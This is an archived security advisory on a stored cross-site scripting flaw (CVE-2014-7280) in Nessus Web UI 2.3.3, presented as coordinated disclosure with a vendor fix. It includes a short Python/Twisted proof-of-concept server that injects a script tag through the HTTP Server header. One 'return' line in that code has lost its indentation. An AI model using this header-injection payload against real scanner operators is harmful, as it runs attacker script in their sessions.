Nessus Web UI 2.3.3 Cross Site Scripting

Nessus Web UI 2.3.3 Cross Site Scripting: Posted Oct 7, 2014; Authored by Frank Lycops | Site thesecurityfactory.be; Nessus Web UI version 2.3.3 suffers from a persistent cross site scripting vulnerability.; tags | exploit, web, xss; advisories | CVE-2014-7280; SHA-256 | d71116074efbc6c1b0ffc472e7d724202c23e1ef436bb1d22546a12de8911c7f; Download | Favorite | View

Nessus Web UI 2.3.3 Cross Site Scripting

Nessus Web UI 2.3.3: Stored XSS
=========================================================

CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version -

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
    def getResourceFor(self, request):
        request.setHeader('server', '<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0

    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"

log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.


-- Timeline --

2014-06-12   Release of Web UI version 2.3.3, build#83

2014-06-13        Vulnerability discovered and creation of POC

2014-06-13        Vulnerability responsibly reported to vendor

2014-06-13        Vulnerability acknowledged by vendor

2014-06-13        Release of Web UI version 2.3.4, build#85

2014-XX-XX        Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be

Top Authors In Last 30 Days

Red Hat 277 files
Ubuntu 101 files
indoushka 44 files
Jasper Nota 25 files
Gentoo 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Debian 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,580)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,432)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,710)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

Nessus Web UI 2.3.3 Cross Site Scripting

Nessus Web UI 2.3.3 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Nessus Web UI 2.3.3 Cross Site Scripting

Share This

Nessus Web UI 2.3.3 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems